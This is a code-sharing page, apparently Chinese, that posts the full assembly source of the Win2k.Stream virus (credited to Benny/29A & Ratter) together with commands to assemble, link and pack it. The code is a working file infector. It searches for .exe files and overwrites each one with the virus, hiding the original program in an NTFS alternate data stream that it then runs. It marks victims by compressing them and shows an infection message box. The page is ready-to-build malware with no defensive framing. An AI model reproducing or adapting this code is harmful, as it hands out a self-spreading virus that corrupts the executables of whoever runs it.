📄 w2k.stream河流病毒的源代码 .txt
字号:
tasm32 /ml /m9 /q stream
tlink32 -Tpe -c -x -aa stream,,,import32
pewrsec stream.exe
petite -9 -e2 -v1 -p1 -y -b0 -r* stream.exe
And here comes the virus source...
#
.586p
.model flat,stdcall
include win32api.inc ;include filez
include useful.inc
extrn ExitProcess:PROC ;used APIz
extrn VirtualFree:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn WinExec:PROC
extrn GetCommandLineA:PROC
extrn GetModuleFileNameA:PROC
extrn DeleteFileA:PROC
extrn ReadFile:PROC
extrn CopyFileA:PROC
extrn WriteFile:PROC
extrn CreateFileA:PROC
extrn CloseHandle:PROC
extrn MessageBoxA:PROC
extrn GetFileSize:PROC
extrn VirtualAlloc:PROC
extrn DeviceIoControl:PROC
extrn GetFileAttributesA:PROC
extrn GetTempFileNameA:PROC
extrn CreateProcessA:PROC
extrn GetVersion:PROC
FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2
;compression flag
STARTUPINFO STRUCT ;used by CreateProcessA API
cb DWORD ?
lpReserved DWORD ?
lpDesktop DWORD ?
lpTitle DWORD ?
dwX DWORD ?
dwY DWORD ?
dwXSize DWORD ?
dwYSize DWORD ?
dwXCountChars DWORD ?
dwYCountChars DWORD ?
dwFillAttribute DWORD ?
dwFlags DWORD ?
wShowWindow WORD ?
cbReserved2 WORD ?
lpReserved2 DWORD ?
hStdInput DWORD ?
hStdOutput DWORD ?
hStdError DWORD ?
STARTUPINFO ENDS
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
@pushvar macro variable, empty ;macro for pushing variablez
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
call next_instr
variable
next_instr:
endm
.data
extExe db '*.exe',0 ;search mask
fHandle dd ? ;file search handle
file_name db MAX_PATH dup(?) ;actual program name
db MAX_PATH dup(?)
file_name2 db MAX_PATH dup(?) ;temprorary file
db 4 dup (?)
WFD WIN32_FIND_DATA ? ;win32 find data
proc_info PROCESS_INFORMATION <> ;used by CreateProcessA
startup_info STARTUPINFO <> ;...
.code
Start: ;start of virus
call GetVersion ;get OS version
cmp al,5 ;5 = Win2000
jnz msgBox ;quit if not Win2000
mov edi,offset file_name
push MAX_PATH
push edi
push 0
call GetModuleFileNameA ;get path+filename of actual
;program
push offset WFD
push offset extExe
call FindFirstFileA ;find first file to infect
test eax,eax
jz end_host
mov [fHandle],eax ;save handle
search_loop:
call infect ;try to infect file
push offset WFD
push dword ptr [fHandle]
call FindNextFileA ;try to find next file
test eax,eax
jne search_loop ;and infect it
push dword ptr [fHandle]
call FindClose ;close file search handle
end_host:
mov esi,offset file_name ;get our filename
push esi
@endsz
dec esi
mov edi,esi
mov eax,"RTS:" ;append there :"STR" stream
stosd ;name
pop esi
call GetCommandLineA ;get command line
xchg eax,edi ;to EDI
;esi - app name
;edi - cmd line
xor eax,eax
push offset proc_info
push offset startup_info
push eax
push eax
push eax
push eax
push eax
push eax
push edi
push esi
call CreateProcessA ;jump to host code
xchg eax,ecx
jecxz msgBox ;if error, show message box
end_app:
push 0
call ExitProcess ;exit
msgBox: push 1000h ;show some lame msg box
@pushsz "Win2k.Stream by Benny/29A & Ratter" ;copyleft :]
@pushsz "This cell has been infected by [Win2k.Stream] virus!"
push 0 ;with name of virus and authorz
call MessageBoxA
jmp end_app
infect: push offset [WFD.WFD_szFileName]
call GetFileAttributesA ;check if the file is NTFS
test eax,800h ;compressed = already infected
jz next_infect
ret ;quit then
next_infect:
push offset [WFD.WFD_szFileName]
mov byte ptr [flagz],OPEN_EXISTING
call Create_File ;open found program
jz infect_end
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push 4
@pushvar <dd 1> ;default compression
push FSCTL_SET_COMPRESSION
push ebx ;NTFS compress it =
call DeviceIoControl ;mark as already infected
; = and save disk space
push ebx
call CloseHandle ;close file handle
mov esi,offset file_name2
push esi
push 0
@pushsz "str"
@pushsz "."
call GetTempFileNameA ;create name for temp file
test eax,eax
jz infect_end
mov edi,offset [WFD.WFD_szFileName]
push 0
push esi
push edi
call CopyFileA ;copy there victim program
test eax,eax
jz infect_end
push 0
push edi
push offset file_name
call CopyFileA ;copy ourself to victim program
push esi
mov esi,edi
@endsz
xchg esi,edi
dec edi
mov eax,"RTS:" ;append :"STR" stream to
stosd ;victim program filename
xor al,al
stosb
call Create_File ;open victim file
jz infect_end
push 0
push ebx
call GetFileSize ;get its size
xchg eax,edi
push PAGE_READWRITE
push MEM_COMMIT or MEM_RESERVE
push edi
push 0
call VirtualAlloc ;allocate enough memory
test eax,eax ;for file content
jz infect_end_handle
xchg eax,esi
xor eax,eax
push eax
@pushvar <file_size dd ?>
push edi
push esi
push ebx
call ReadFile ;read file content to
test eax,eax ;allocated memory
jz infect_end_handle
push ebx
call CloseHandle ;close its file handle
push offset file_name2
call DeleteFileA ;delete temporary file
mov byte ptr [flagz],CREATE_ALWAYS
push offset [WFD.WFD_szFileName]
call Create_File ;open stream
jz infect_end_dealloc
push 0
mov ecx,offset file_size
push ecx
push dword ptr [ecx]
push esi
push ebx
call WriteFile ;write there victim program
test eax,eax
jz infect_end_handle
infect_end_handle:
push ebx
call CloseHandle ;close its file handle
infect_end_dealloc:
push MEM_DECOMMIT
push dword ptr [file_size]
push esi
call VirtualFree ;free allocated memory
push MEM_RELEASE
push 0
push esi
call VirtualFree ;release reserved part of mem
infect_end:
ret
; [esp+4] - file_name
Create_File: ;proc for opening file
xor eax,eax
push eax
push eax
db 6ah
flagz db OPEN_EXISTING ;variable file open flag
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push dword ptr [esp+1ch]
call CreateFileA ;open file
xchg eax,ebx ;handle to EBX
inc ebx ;is EBX -1?
lahf ;store flags
dec ebx ;correct EBX
sahf ;restore flags
retn 4 ;quit from proc
end Start ;end of virus
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -